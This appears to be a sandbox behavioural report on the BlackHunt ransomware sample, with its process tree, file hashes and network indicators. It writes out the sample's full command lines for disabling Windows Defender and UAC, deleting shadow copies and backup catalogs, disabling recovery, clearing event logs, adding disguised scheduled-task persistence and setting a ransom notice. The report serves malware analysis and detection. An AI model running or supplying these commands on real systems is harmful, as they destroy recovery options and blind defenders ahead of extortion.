PID 2920 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2668 wrote to memory of 1164 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2668 wrote to memory of 1164 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2668 wrote to memory of 1164 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2920 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2920 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D F:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D M:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Setup

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Application

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl System

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security /e:false

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\system32\notepad.exe

notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\system32\taskkill.exe

taskkill /IM mshta.exe /f

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 5

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

C:\ProgramData\#BlackHunt_ReadMe.txt

MD5 587345576e293bae27510d5b5f86f90f
SHA1 0d6ebe9b4759c49d94007f84b8afb313aa35f066
SHA256 02f8fe1de9292b3b7d103a3e3ae8db866e220e2311438591b2052cdcfadb7fee
SHA512 d73b34a89399db8bc809eccd1a3a8f652c48e8ca22b452f2c4b8df700d1863cc05ad17dee3725952063092e89d3799c895efff52eab17bf85ffea7a3401e426d

C:\ProgramData\#BlackHunt_Private.key

MD5 81d51d68908764b737d787768500517a
SHA1 26647e4908fb6805b06b3f41737a993bbb114fbd
SHA256 8f40c6ff5c22a23791f1a28dd864e35e03008a6b5ef1b490c1833101db014590
SHA512 6562d1ef9077ee78e68925a1f77d45ba08219d84d6e204a38c6150c16920cad1db1e9be3a546de9d7afff511608cc67a5a9746bbceb32b9766ce15691cd98563

C:\MSOCache\#BlackHunt_ReadMe.hta

MD5 435ca8a6e9bc47e172512a6e195de294
SHA1 032cde2beb004dd13efcc63b95619d84bbdf8225
SHA256 23aaa8c0746141eea6770c019158a4fd5587234ecd8bd11bf17775a55d878c45
SHA512 634f07cea2d4f96c83dba47412bc4367935670c26892a5d53d3accf5178169dea9a6d20dc759a3d2f69d7545f65907abe8e87fd79656532bc42b91172d2a2fb4

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-06 00:57

Reported

2024-11-06 01:00

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

Signatures

Deletes NTFS Change Journal

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\fsutil.exe N/A
N/A N/A C:\Windows\system32\fsutil.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (3392) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables use of System Restore points

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\System32\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" C:\Windows\system32\reg.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
